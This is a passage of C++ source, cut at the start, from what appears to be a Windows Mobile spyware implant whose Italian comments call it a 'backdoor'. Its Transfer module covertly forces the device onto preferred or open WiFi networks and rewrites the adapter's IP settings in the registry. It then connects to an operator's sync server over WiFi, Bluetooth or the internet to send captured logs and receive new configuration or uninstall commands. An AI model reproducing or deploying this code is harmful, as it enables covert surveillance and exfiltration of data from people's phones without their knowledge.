		DeActivateBT();
		closesocket(BTSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while (i < retryTimes) {
		if(Send(CONF_SYNC_BT) == TRUE){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();

			if(bUninstall)
				return SEND_UNINSTALL;

			if(bNewConf)
				return SEND_RELOAD;

			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	DeActivateBT();
	closesocket(BTSocket);
	WSACleanup();
	return FALSE;
}

// Forza una connessione ad una rete WiFi provando ad ottenere un IP tramite
// DHCP per effettuare la sync verso il server internet.
BOOL Transfer::ForceWiFiConnection() {
	struct BSSIDInfo bssid;
	
	// Abbiamo forzato una connessione che ancora non e' stata rilasciata
	if(bWiFiForced)
		return FALSE;

	ZeroMemory(&bssid, sizeof(bssid));

	// Se siamo gia' connessi non possiamo forzare il cambio di connessione
	if(IsWiFiConnectionAvailable())
		return FALSE;

	// Se siamo gia' connessi non possiamo forzare il cambio di connessione
	if(ActivateWiFi() == FALSE)
		return FALSE;

	// Controlliamo di non essere gia' associati, in caso non possiamo terminare la connessione
	if(wifiObj->WZCCheckAssociation(pWifiAdapter))
		return FALSE;

	// Connettiamoci ad una rete preferita, se presente
	if(wifiObj->WZCConnectToPreferred(pWifiAdapter)) {
		bWiFiForced = TRUE;
		return TRUE;
	}

	// Connettiamoci ad una rete aperta
	if(wifiObj->WZCConnectToOpen(pWifiAdapter)) {
		bWiFiForced = TRUE;
		return TRUE;
	}

/*
	// Prendiamo gli attuali mask e ip
	ulOriginalIp = GetAdapterIP(pWifiAdapter);
	ulOriginalMask = GetAdapterMask(pWifiAdapter);
	
	// Cerchiamo la nostra rete
	if(wifiObj->GetBSSID(pWifiAdapter, L"nobody", &bssid) == FALSE)
		return FALSE;
	
	// Disassociamoci da qualunque rete preconfigurata... Giusto per sicurezza
	if(wifiObj->Disassociate(pWifiAdapter) == FALSE)
		return FALSE;

	// Colleghiamoci alla nuova rete
	if(wifiObj->WZCConfigureNetwork(pWifiAdapter, &bssid, (BYTE *)&WepKey, 5) == FALSE)
		return FALSE;

	// Diamo alla backdoor il tempo di associarsi
	Sleep(8000);

	// Impostiamo il nostro nuovo ip/mask (198.18.0.0 - 198.19.255.255 	198.18.0.0/15)
	// Il server e' .106
	DWORD dwNewIp = (DWORD)inet_addr("198.18.211.105");
	DWORD dwNewMask = (DWORD)inet_addr("255.255.255.0");
	DWORD Index = GetAdapterIndex(pWifiAdapter);
	
	// Aggiungiamo il nostro IP
	if(AddIPAddress(dwNewIp, dwNewMask, Index, &NTEContext, &NTEInstance) != NO_ERROR)
		return FALSE;
*/
	return FALSE;
}

BOOL Transfer::ForceGprsConnection() {
	if(bGprsForced)
		return FALSE;


	bGprsForced = TRUE;
	return TRUE;
}

BOOL Transfer::ReleaseWiFiConnection() {
	if(bWiFiForced == FALSE)
		return FALSE;

	//if(wifiObj->Disassociate(pWifiAdapter) == FALSE)
	//	return FALSE;

	// Rimuoviamo l'IP che avevamo aggiunto
	//if(DeleteIPAddress(NTEContext) != NO_ERROR)
	//	return FALSE;

	if(DeActivateWiFi() == FALSE)
		return FALSE;

	bWiFiForced = FALSE;
	return TRUE;
}

BOOL Transfer::ReleaseGprsConnection() {
	if(bGprsForced == FALSE)
		return FALSE;

	bGprsForced = FALSE;
	return TRUE;
}

UINT Transfer::WiFiSendPda() {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	sockaddr_in saw;
	struct BSSIDInfo bssid;	
	ULONG dwNewIp, dwNewMask;
	SHORT sPort;
	DWORD Index = GetAdapterIndex(pWifiAdapter);
	ULONG lLocalContext = 0, lLocalInstance = 0;
	UINT poll, times, i;
	INT ret;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&saw, sizeof(saw));
	ZeroMemory(&bssid, sizeof(bssid));

	// Impostiamo il nostro nuovo ip/mask (198.18.0.0 - 198.19.255.255 	198.18.0.0/15)
	// Il server e' .106, la porta e' 6969
	dwNewIp = inet_addr("169.254.171.209");
	dwNewMask = inet_addr("255.255.0.0");
	sPort = htons(80); // Porta del server di sync

	WAIT_AND_SIGNAL(statusObj->hConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->hConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_WIFIIP: // Per ora lo impostiamo noi
				//SetWiFiIp(*(BT_ADDR *)((*iter)->pParams));
				break;

			case CONFIGURATION_WIFIENC: // Per ora solo trasmettiamo in chiaro
				//SetWiFiEncryption((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;

			case CONFIGURATION_WIFIKEY:
				SetWifiKey((BYTE *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_WIFISSID:
				SetWifiSSID((WCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			default: break;
		}
	}
	UNLOCK(statusObj->hConfigLock);

	if(SetWirelessIp(pWifiAdapter, dwNewIp, dwNewMask) == FALSE)
		return FALSE;

	// Serve a flushare i settings della scheda
	ActivateWiFi();
	DeActivateWiFi();

	if(WSAStartup(MAKEWORD(1,0), &wsd) != 0) {
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	if(ActivateWiFi() == FALSE){
		RestoreWirelessIp(pWifiAdapter);
		WSACleanup();
		return FALSE;
	}

	Sleep(6000);

	wifiSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if(wifiSocket == INVALID_SOCKET){
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		WSACleanup();
		return FALSE;
	}

	// Cerchiamo la nostra rete
	if(wifiObj->GetBSSID(pWifiAdapter, wSsid, &bssid) == FALSE) {
		memcpy(&bssid.SSID, wSsid, WideLen(wSsid));
	}

	// Disassociamoci da qualunque rete preconfigurata... Giusto per sicurezza
	if(wifiObj->Disassociate(pWifiAdapter) == FALSE) {
		WSACleanup();
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	//Sleep(3000);

	// Aggiungiamo il nostro IP sull'interfaccia (non serve se chiamiamo la SetWirelessIp()
	/*if(AddIPAddress(dwNewIp, dwNewMask, Index, &lLocalContext, &lLocalInstance) != NO_ERROR) {
		RestoreWirelessIp(pWifiAdapter);
		WSACleanup();
		DeActivateWiFi();
		return FALSE;
	}*/

	// Colleghiamoci alla nuova rete
	if(wifiObj->WZCConfigureNetwork(pWifiAdapter, &bssid, wifiKey, uWifiKeyLen) == FALSE) {
		WSACleanup();
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	// Diamo alla backdoor il tempo di associarsi
	Sleep(10000);

	saw.sin_family = AF_INET;
	saw.sin_addr.s_addr = inet_addr("169.254.171.210"); //dwNewIp + 1; // Il server e' il nostro IP + 1
	saw.sin_port = sPort;

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(wifiSocket, (const sockaddr *)&saw, sizeof(saw));

		if(ret) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}


	// Non si riesce a connettere, torniamo con un errore
	if (ret) {
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		closesocket(wifiSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while (i < retryTimes) {
		if(Send(CONF_SYNC_WIFI) == TRUE){
			DeActivateWiFi();
			RestoreWirelessIp(pWifiAdapter);
			closesocket(wifiSocket);
			WSACleanup();

			if(bUninstall)
				return SEND_UNINSTALL;

			if(bNewConf)
				return SEND_RELOAD;

			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	DeActivateWiFi();
	RestoreWirelessIp(pWifiAdapter);
	closesocket(wifiSocket);
	WSACleanup();
	return FALSE;
}

UINT Transfer::WiFiSendInternet(WCHAR *pwHostname) {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	sockaddr_in saw;
	struct BSSIDInfo bssid;	
	ULONG dwNewIp, dwNewMask;
	SHORT sPort;
	DWORD Index = GetAdapterIndex(pWifiAdapter);
	ULONG lLocalContext = 0, lLocalInstance = 0;
	UINT poll, times, i;
	INT ret;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&saw, sizeof(saw));
	ZeroMemory(&bssid, sizeof(bssid));

	// Impostiamo il nostro nuovo ip/mask (198.18.0.0 - 198.19.255.255 	198.18.0.0/15)
	// Il server e' .106, la porta e' 6969
	dwNewIp = inet_addr("169.254.171.209");
	dwNewMask = inet_addr("255.255.0.0");
	sPort = htons(80); // Porta del server di sync

	WAIT_AND_SIGNAL(statusObj->hConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->hConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_WIFIIP: // Per ora lo impostiamo noi
				//SetWiFiIp(*(BT_ADDR *)((*iter)->pParams));
				break;

			case CONFIGURATION_WIFIENC: // Per ora solo trasmettiamo in chiaro
				//SetWiFiEncryption((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;

			case CONFIGURATION_WIFIKEY:
				SetWifiKey((BYTE *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			case CONFIGURATION_WIFISSID:
				SetWifiSSID((WCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;

			default: break;
		}
	}
	UNLOCK(statusObj->hConfigLock);

	if(SetWirelessIp(pWifiAdapter, dwNewIp, dwNewMask) == FALSE)
		return FALSE;

	// Serve a flushare i settings della scheda
	ActivateWiFi();
	DeActivateWiFi();

	if(WSAStartup(MAKEWORD(1,0),&wsd) != 0) {
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	if(ActivateWiFi() == FALSE){
		RestoreWirelessIp(pWifiAdapter);
		WSACleanup();
		return FALSE;
	}

	Sleep(6000);

	wifiSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if(wifiSocket == INVALID_SOCKET){
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		WSACleanup();
		return FALSE;
	}

	// Cerchiamo la nostra rete
	if(wifiObj->GetBSSID(pWifiAdapter, wSsid, &bssid) == FALSE) {
		memcpy(&bssid.SSID, wSsid, WideLen(wSsid));
	}

	// Disassociamoci da qualunque rete preconfigurata... Giusto per sicurezza
	if(wifiObj->Disassociate(pWifiAdapter) == FALSE) {
		WSACleanup();
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	//Sleep(3000);

	// Aggiungiamo il nostro IP sull'interfaccia (non serve se chiamiamo la SetWirelessIp()
	/*if(AddIPAddress(dwNewIp, dwNewMask, Index, &lLocalContext, &lLocalInstance) != NO_ERROR) {
	RestoreWirelessIp(pWifiAdapter);
	WSACleanup();
	DeActivateWiFi();
	return FALSE;
	}*/

	// Colleghiamoci alla nuova rete
	if(wifiObj->WZCConfigureNetwork(pWifiAdapter, &bssid, wifiKey, uWifiKeyLen) == FALSE) {
		WSACleanup();
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		return FALSE;
	}

	// Diamo alla backdoor il tempo di associarsi
	Sleep(10000);

	saw.sin_family = AF_INET;
	saw.sin_addr.s_addr = inet_addr("169.254.171.210"); //dwNewIp + 1; // Il server e' il nostro IP + 1
	saw.sin_port = sPort;

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(wifiSocket, (const sockaddr *)&saw, sizeof(saw));

		if(ret) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}


	// Non si riesce a connettere, torniamo con un errore
	if (ret) {
		DeActivateWiFi();
		RestoreWirelessIp(pWifiAdapter);
		closesocket(wifiSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while (i < retryTimes) {
		if(Send(CONF_SYNC_WIFI) == TRUE){
			DeActivateWiFi();
			RestoreWirelessIp(pWifiAdapter);
			closesocket(wifiSocket);
			WSACleanup();

			if(bUninstall)
				return SEND_UNINSTALL;

			if(bNewConf)
				return SEND_RELOAD;

			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	DeActivateWiFi();
	RestoreWirelessIp(pWifiAdapter);
	closesocket(wifiSocket);
	WSACleanup();
	return FALSE;
}

UINT Transfer::InternetSend(WCHAR *pwHostname) {
	WSADATA wsd;
	USHORT sPort = 443;
	CHAR *pHost = NULL;
	BOOL bIsIp = TRUE;
	UINT i;
	INT ret;
	struct in_addr addr;
	struct sockaddr_in saw;
	struct hostent *remoteHost;

	if(pwHostname == NULL || wcslen(pwHostname) == 0)
		return FALSE;

	if(WSAStartup(MAKEWORD(1,0), &wsd) != 0)
		return FALSE;

	pHost = new(std::nothrow) CHAR[wcslen(pwHostname) + 1];

	if(pHost == NULL)
		return FALSE;

	ZeroMemory(&saw, sizeof(saw));
	ZeroMemory(pHost, wcslen(pwHostname) + 1);
	sprintf(pHost, "%S", pwHostname);

	// La stringa e' un IP o un hostname?
	for(i = 0; i < wcslen(pwHostname); i++) {
		if((pHost[i] < '0' || pHost[i] > '9') && pHost[i] != '.') {
			bIsIp = FALSE;
			break;
		}
	}

	// Risolviamo l'hostname
	if(bIsIp) {
		addr.S_un.S_addr = inet_addr(pHost);

		if (addr.s_addr == INADDR_NONE) {
			delete[] pHost;
			WSACleanup();
			return FALSE; // Indirizzo non valido
		}
	} else {
		remoteHost = gethostbyname(pHost);

		if(remoteHost == NULL) {
			delete[] pHost;
			WSACleanup();
			return FALSE;
		}

		CopyMemory(&addr.S_un.S_addr, remoteHost->h_addr_list, remoteHost->h_length);
	}

	delete[] pHost;

	internetSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	if(internetSocket == INVALID_SOCKET){
		WSACleanup();
		return FALSE;
	}

	saw.sin_family = AF_INET;
	saw.sin_addr.s_addr = addr.S_un.S_addr;
	saw.sin_port = sPort;

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(internetSocket, (const sockaddr *)&saw, sizeof(saw));

		if(ret) {
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	// Non si riesce a connettere, torniamo con un errore
	if (ret) {
		closesocket(internetSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while (i < retryTimes) {
		if(Send(CONF_SYNC_INTERNET) == TRUE){
			closesocket(internetSocket);
			WSACleanup();

			if(bUninstall)
				return SEND_UNINSTALL;

			if(bNewConf)
				return SEND_RELOAD;

			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	closesocket(internetSocket);
	WSACleanup();
	return TRUE;
}

BOOL Transfer::SetPollInterval(UINT uPoll, UINT uTimes) {
	pollInterval = uPoll;
	retryTimes = uTimes;

	if(pollInterval == 0)
		pollInterval = 1000;

	return TRUE;
}

INT Transfer::SendData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || pData == NULL)
		return SOCKET_ERROR;

	if(Len == 0)
		return 0;

	tmp = (CHAR *)pData;
	offset = 0;
	ret = 0;

	while((UINT)ret < Len - offset) {
		ret = send(s, tmp, Len - offset, 0);

		if(ret == SOCKET_ERROR)
			return SOCKET_ERROR;

		if((UINT)ret < Len - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret;
	CHAR *tmp = NULL;
	
	if(s == NULL || s == INVALID_SOCKET || pData == NULL || Len == 0)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)pData, Len, 0);

	if(ret == 0){
		return SOCKET_ERROR;
	}

	if(ret == SOCKET_ERROR) {
		ret = WSAGetLastError();

		if(ret == WSAEMSGSIZE)
			return ret;

		return SOCKET_ERROR;
	}

	return ret;
}

INT Transfer::SendCommand(SOCKET s, UINT uCommand) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || uCommand == INVALID_COMMAND)
		return SOCKET_ERROR;

	tmp = (CHAR *)&uCommand;
	offset = 0;
	ret = 0;

	while((UINT)ret < sizeof(uCommand) - offset) {
		ret = send(s, tmp, sizeof(uCommand), 0);

		if(ret == SOCKET_ERROR)
			return ret;

		if((UINT)ret < sizeof(uCommand) - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvCommand(SOCKET s) {
	INT ret;
	CHAR *tmp = NULL;
	UINT uData;

	if(s == NULL || s == INVALID_SOCKET)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)&uData, sizeof(uData), 0);

	if(ret == 0 || ret == SOCKET_ERROR){
		return SOCKET_ERROR;
	}

	return uData;
}

BOOL Transfer::GetNewConf(SOCKET s) {
	UINT Len;
	BYTE *pNewConf = NULL;

	// Leggiamo la lunghezza del file
	if(RecvData(s, (BYTE *)&Len, sizeof(Len)) == SOCKET_ERROR) {
		return FALSE;
	}

	if(Len == 0)
		return FALSE;

	// Spediamo l'OK al server
	if(SendCommand(s, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	pNewConf = new(std::nothrow) BYTE[Len];

	if(pNewConf == NULL)
		return FALSE;

	if(RecvData(s, pNewConf, Len) == SOCKET_ERROR) {
		delete[] pNewConf;
		return FALSE;
	}

	// Scriviamo la nuova conf
	Conf *pConf = NULL;
	WCHAR *pBackName = NULL;
	HANDLE hBackup = INVALID_HANDLE_VALUE;	
	DWORD dwWritten = 0;

	pConf = new(std::nothrow) Conf();

	if(pConf == NULL) {
		delete[] pNewConf;
		return FALSE;
	}

	pBackName = pConf->GetBackupName(TRUE);

	delete pConf;

	if(pBackName == NULL) {
		delete[] pNewConf;	
		return FALSE;		
	}

	hBackup = CreateFile(pBackName, GENERIC_WRITE, FILE_SHARE_READ, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);

	delete[] pBackName;

	if(hBackup == INVALID_HANDLE_VALUE) {
		delete[] pNewConf;
		return FALSE;
	}

	if(WriteFile(hBackup, pNewConf, Len, &dwWritten, NULL) == FALSE) {
		WCHAR *p = GetCurrentPath(pBackName);

		CloseHandle(hBackup);
		DeleteFile(p);
		delete[] pNewConf;
		delete[] p;
		return FALSE;
	}

	CloseHandle(hBackup);
	delete[] pNewConf;

	// Spediamo l'OK al server
	if(SendCommand(s, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	return TRUE;
}

DWORD Transfer::GetAdapterIP(WCHAR *wAdapterName) {
	ULONG pdwSize = 0, Index = 0;
	PMIB_IPADDRTABLE pIpAddrTable = NULL;
	UINT i;

	if(wAdapterName == NULL || wcslen(wAdapterName) == 0)
		return 0;

	while(GetIpAddrTable(pIpAddrTable, &pdwSize, FALSE) == ERROR_INSUFFICIENT_BUFFER) {
		if(pIpAddrTable) {
			delete[] pIpAddrTable;
			pIpAddrTable = NULL;
		}

		pIpAddrTable = (PMIB_IPADDRTABLE)new(std::nothrow) BYTE[pdwSize];

		if(pIpAddrTable == NULL)
			return 0;

		ZeroMemory(pIpAddrTable, pdwSize);
	}

	// Prendiamo l'index della nostra scheda WiFi
	if(::GetAdapterIndex(wAdapterName, &Index) != NO_ERROR) {
		delete[] pIpAddrTable;
		return 0;
	}

	// Cerchiamo il primo IP dell'adattatore (potrebbero comunque esistere piu' rotte)
	for (i = 0; i < pIpAddrTable->dwNumEntries; i++) {
		if(pIpAddrTable->table[i].dwIndex == Index) {
			delete[] pIpAddrTable;
			return pIpAddrTable->table[i].dwAddr;
		}
	}

	// Non abbiamo trovato l'adattatore, torniamo 0
	delete[] pIpAddrTable;
	return 0;
}

DWORD Transfer::GetAdapterMask(WCHAR *wAdapterName) {
	ULONG pdwSize = 0, Index = 0;
	PMIB_IPADDRTABLE pIpAddrTable = NULL;
	UINT i;

	if(wAdapterName == NULL || wcslen(wAdapterName) == 0)
		return 0;

	while(GetIpAddrTable(pIpAddrTable, &pdwSize, FALSE) == ERROR_INSUFFICIENT_BUFFER) {
		if(pIpAddrTable) {
			delete[] pIpAddrTable;
			pIpAddrTable = NULL;
		}

		pIpAddrTable = (PMIB_IPADDRTABLE)new(std::nothrow) BYTE[pdwSize];

		if(pIpAddrTable == NULL)
			return 0;

		ZeroMemory(pIpAddrTable, pdwSize);
	}

	// Prendiamo l'index della nostra scheda WiFi
	if(::GetAdapterIndex(wAdapterName, &Index) != NO_ERROR) {
		delete[] pIpAddrTable;
		return 0;
	}

	// Cerchiamo il primo IP dell'adattatore (potrebbero comunque esistere piu' rotte)
	for (i = 0; i < pIpAddrTable->dwNumEntries; i++) {
		if(pIpAddrTable->table[i].dwIndex == Index) {
			delete[] pIpAddrTable;
			return pIpAddrTable->table[i].dwMask;
		}
	}

	// Non abbiamo trovato l'adattatore, torniamo 0
	delete[] pIpAddrTable;
	return 0;
}

DWORD Transfer::GetAdapterIndex(WCHAR *wAdapterName) {
	ULONG Index = 0;

	if(wAdapterName == NULL || wcslen(wAdapterName) == 0)
		return 0;

	// Prendiamo l'index della nostra scheda WiFi
	if(::GetAdapterIndex(wAdapterName, &Index) != NO_ERROR)
		return 0;

	return (DWORD)Index;
}

BOOL Transfer::SetWirelessIp(WCHAR *wAdapterName, ULONG uIp, ULONG uMask) {
	WCHAR *wKeypath = NULL;
	HKEY hRes;
	DWORD dwDim, dwType;

	dwDim = dwType = 0;

	if(wAdapterName == NULL || wcslen(wAdapterName) == 0)
		return FALSE;

	wKeypath = new(std::nothrow) WCHAR[wcslen(wAdapterName) + wcslen(L"Comm\\x\\Parms\\TcpIp")];

	if(wKeypath == NULL)
		return FALSE;

	ZeroMemory(wKeypath, WideLen(wAdapterName) + WideLen(L"Comm\\x\\Parms\\TcpIp"));
	wsprintf(wKeypath, L"Comm\\%s\\Parms\\TcpIp", wAdapterName);

	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, wKeypath, 0, 0, &hRes) != ERROR_SUCCESS) {
		delete[] wKeypath;
		return FALSE;
	}

	delete[] wKeypath;

	dwDim = 4;
	if(RegQueryValueEx(hRes, L"EnableDHCP", NULL, &dwType, (PBYTE)&ulRegistryDhcp, &dwDim) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	// Troviamo la dimensione del buffer per l'IP
	dwDim = 0;
	if(RegQueryValueEx(hRes, L"IpAddress", NULL, NULL, NULL, &dwDim) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(pwRegistryIp) {
		delete[] pwRegistryIp;
		pwRegistryIp = NULL;
	}

	pwRegistryIp = new(std::nothrow) WCHAR[dwDim + 1];

	if(pwRegistryIp == NULL) {
		RegCloseKey(hRes);
		return FALSE;
	}

	ZeroMemory(pwRegistryIp, (dwDim + 1) * sizeof(WCHAR));

	// Leggiamo il vecchio valore
	if(RegQueryValueEx(hRes, L"IpAddress", NULL, NULL, (PBYTE)pwRegistryIp, &dwDim) != ERROR_SUCCESS) {
		delete[] pwRegistryIp;
		RegCloseKey(hRes);
		return FALSE;
	}

	// Troviamo la dimensione del buffer per la netmask
	dwDim = 0;
	if(RegQueryValueEx(hRes, L"Subnetmask", NULL, NULL, NULL, &dwDim) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(pwRegistryMask) {
		delete[] pwRegistryMask;
		pwRegistryMask = NULL;
	}

	pwRegistryMask = new(std::nothrow) WCHAR[dwDim + 1];

	if(pwRegistryMask == NULL) {
		RegCloseKey(hRes);
		return FALSE;
	}

	ZeroMemory(pwRegistryMask, (dwDim + 1) * sizeof(WCHAR));

	// Leggiamo il vecchio valore
	if(RegQueryValueEx(hRes, L"Subnetmask", NULL, NULL, (PBYTE)pwRegistryMask, &dwDim) != ERROR_SUCCESS) {
		delete[] pwRegistryIp;
		RegCloseKey(hRes);
		return FALSE;
	}

	// Scriviamo i nuovi valori
	WCHAR wNewIp[16], wNewMask[16];
	in_addr addr;
	DWORD dwDhcp = 0;

	ZeroMemory(wNewIp, sizeof(wNewIp));
	ZeroMemory(wNewMask, sizeof(wNewMask));

	addr.S_un.S_addr = uIp;
	wsprintf(wNewIp, L"%S", inet_ntoa(addr));

	addr.S_un.S_addr = uMask;
	wsprintf(wNewMask, L"%S", inet_ntoa(addr));

	if(RegSetValueEx(hRes, L"EnableDHCP", 0, REG_DWORD, (BYTE *)&dwDhcp, 4) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(RegSetValueEx(hRes, L"IpAddress", 0, REG_MULTI_SZ, (BYTE *)wNewIp, 16 * sizeof(WCHAR)) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(RegSetValueEx(hRes, L"Subnetmask", 0, REG_MULTI_SZ, (BYTE *)wNewMask, 16 * sizeof(WCHAR)) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	RegCloseKey(hRes);
	return TRUE;
}

BOOL Transfer::RestoreWirelessIp(WCHAR *wAdapterName) {
	WCHAR *wKeypath = NULL;
	HKEY hRes;
	UINT uIpLen, uMaskLen;

	if(wAdapterName == NULL || wcslen(wAdapterName) == 0 || pwRegistryIp == NULL || pwRegistryMask == NULL)
		return FALSE;

	wKeypath = new(std::nothrow) WCHAR[wcslen(wAdapterName) + wcslen(L"Comm\\x\\Parms\\TcpIp")];

	if(wKeypath == NULL)
		return FALSE;

	ZeroMemory(wKeypath, WideLen(wAdapterName) + WideLen(L"Comm\\x\\Parms\\TcpIp"));
	wsprintf(wKeypath, L"Comm\\%s\\Parms\\TcpIp", wAdapterName);

	if(RegOpenKeyEx(HKEY_LOCAL_MACHINE, wKeypath, 0, 0, &hRes) != ERROR_SUCCESS) {
		delete[] wKeypath;
		return FALSE;
	}

	delete[] wKeypath;

	// Scriviamo i nuovi valori
	uIpLen = WideLen(pwRegistryIp) + sizeof(WCHAR);
	uMaskLen = WideLen(pwRegistryMask) + sizeof(WCHAR);

	if(RegSetValueEx(hRes, L"EnableDHCP", 0, REG_DWORD, (BYTE *)&ulRegistryDhcp, 4) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(RegSetValueEx(hRes, L"IpAddress", 0, REG_MULTI_SZ, (BYTE *)pwRegistryIp, uIpLen) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(RegSetValueEx(hRes, L"Subnetmask", 0, REG_MULTI_SZ, (BYTE *)pwRegistryMask, uMaskLen) != ERROR_SUCCESS) {
		RegCloseKey(hRes);
		return FALSE;
	}

	if(pwRegistryIp) {
		delete[] pwRegistryIp;
		pwRegistryIp = NULL;
	}

	if(pwRegistryIp) {
		delete[] pwRegistryIp;
		pwRegistryIp = NULL;
	}

	if(pwRegistryMask) {
		delete[] pwRegistryMask;
		pwRegistryMask = NULL;
	}

	RegCloseKey(hRes);
	return TRUE;
}

BOOL Transfer::ClearLogSnapshot() {
	list<LogInfo>::iterator iter;

	if(pSnap == NULL)
		return TRUE;

	for(iter = pSnap->begin(); iter != pSnap->end(); iter++) {
		if((*iter).pLog) {
			delete[] (*iter).pLog;
			(*iter).pLog = NULL;
		}
	}

	pSnap->clear();
	delete pSnap;
	pSnap = NULL;

	return TRUE;
}